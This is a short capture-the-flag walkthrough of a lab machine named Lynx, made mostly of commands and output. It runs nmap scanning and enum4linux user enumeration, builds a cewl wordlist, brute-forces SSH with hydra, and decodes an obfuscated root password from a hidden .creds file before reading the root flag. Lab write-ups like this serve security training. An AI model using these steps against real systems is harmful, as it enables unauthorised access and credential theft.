enum4linux --> dicovery username --> cewl --> generate wordslist --> brute force ssh connexion --> Dicovery .creds file on desktop
--> Discovery password


└─$ sudo nmap -sT -A -Pn -n -p- 192.168.110.28 -o nmap.txt
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-06-21 17:15 CEST
Nmap scan report for 192.168.110.28
Host is up (0.00016s latency).
Not shown: 65530 closed ports
PORT    STATE SERVICE     VERSION
21/tcp  open  ftp         vsftpd 3.0.3
22/tcp  open  ssh         OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 26:21:06:43:f3:27:b0:2f:df:eb:37:c0:26:d7:58:2a (RSA)
|   256 cd:a2:e4:63:31:78:79:a1:56:1d:1d:bd:85:ee:6b:fb (ECDSA)
|_  256 dd:bc:7e:1d:a3:ad:ff:aa:1a:3f:d3:68:a4:42:ea:1b (ED25519)
80/tcp  open  http        Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title:  Lynx 
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 4.9.5-Debian (workgroup: WORKGROUP)
MAC Address: 08:00:27:2A:A1:C5 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.6
Network Distance: 1 hop
Service Info: Host: LYNX; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: -40m02s, deviation: 1h09m16s, median: -2s
|_nbstat: NetBIOS name: LYNX, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.9.5-Debian)
|   Computer name: lynx
|   NetBIOS computer name: LYNX\x00
|   Domain name: \x00
|   FQDN: lynx
|_  System time: 2021-06-21T17:15:33+02:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2021-06-21T15:15:33
|_  start_date: N/A

TRACEROUTE
HOP RTT     ADDRESS
1   0.16 ms 192.168.110.28

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.83 seconds

└─$ enum4linux 192.168.110.28 > enum.txt

[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
S-1-22-1-1000 Unix User\johannes (Local User)


└─$ cewl http://192.168.110.28 > wordslist      


└─$ hydra -l johannes -P  wordslist ssh://192.168.110.28
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-06-21 17:40:38
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 51 login tries (l:1/p:51), ~4 tries per task
[DATA] attacking ssh://192.168.110.28:22/
[22][ssh] host: 192.168.110.28   login: johannes   password: constelaciones
1 of 1 target successfully completed, 1 valid password found


johannes@Lynx:~/Desktop$ cat .creds 
MjBLbDdpUzFLQ2FuaU84RFdNemg6dG9vcg==


johannes@Lynx:~/Desktop$ echo MjBLbDdpUzFLQ2FuaU84RFdNemg6dG9vcg== | base64 -d |rev
root:hzMWD8OinaCK1Si7lK02johannes@Lynx:~/Desktop$ su

root@Lynx:~# cat /root/root.txt 
4xKWoV6QGHTetItzD7mI
